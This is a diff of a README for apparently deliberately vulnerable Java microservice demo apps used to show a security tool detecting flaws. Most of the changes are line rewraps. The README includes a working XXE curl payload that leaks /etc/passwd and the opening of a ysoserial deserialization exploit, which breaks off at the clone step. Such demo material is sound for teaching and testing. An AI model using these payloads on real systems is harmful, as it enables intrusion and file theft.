davidaustinarcher/java-microservice-sample-apps/README.md

 ```

 ## Detecting the vulnerabilities
-To detect the vulnerabilities, start the apps with Contrast enabled as described above.
-Then use the services to exercise the code.
-It isn't necessary to exploit the vulnerabilities in order for Contrast to identify the vulnerabilities.
+To detect the vulnerabilities, start the apps with Contrast enabled as
+described above.
+Then use the services or `exercise-apps.sh` to exercise the
+code.
+Note that it isn't necessary to exploit the vulnerabilities in order
+for Contrast to identify the vulnerabilities.

 ## Exploiting the Vulnerabilities

 ### XML External Entity (XXE)
-The XXE vulnerability can be exploited directly in the bookstore-frontend by adding a new malicious
+The XXE vulnerability can be exploited directly in the bookstore-frontend by
-book:
+adding a new malicious book:
 ```
 $ curl -H "Content-Type: application/xml" http://localhost:8000/add -d '<?xml version="1.0"?><!DOCTYPE book [<!ENTITY xxe SYSTEM "/etc/passwd">]><book><title>foo &xxe;</title><pages>21</pages></book>'
 ```

-Now the contents of `/etc/passwd` has leaked into the the new book title, which you can see by
+Now the contents of `/etc/passwd` has leaked into the the new book title, which
-checking the book titles:
+you can see by checking the book titles:
 ```
 $ curl http://localhost:8000/list
 ```

 ### Deserialization
-The `bookstore-data-manager` offers an "update a book" service that is not supposed to be used from
+The `bookstore-data-manager` offers an "update a book" service that is not
-the outside, which is why it's not available through the `bookstore-frontend`.
+supposed to be used from the outside, which is why it's not available through
+the `bookstore-frontend`.

-This service is available at `/update`, and it accepts a binary, serialized Java object with `Book`
+This service is available at `/update`, and it accepts a binary, serialized
-type.
+Java object with `Book` type.

-To exploit this, we must first make an exploit that creates a file in `/tmp` as a proof-of-concept:
+To exploit this, we must first make an exploit that creates a file in `/tmp` as
+a proof-of-concept:
 ```
 $ git clone https://github.com/frohoff/ysoserial
 $ cd ysoserial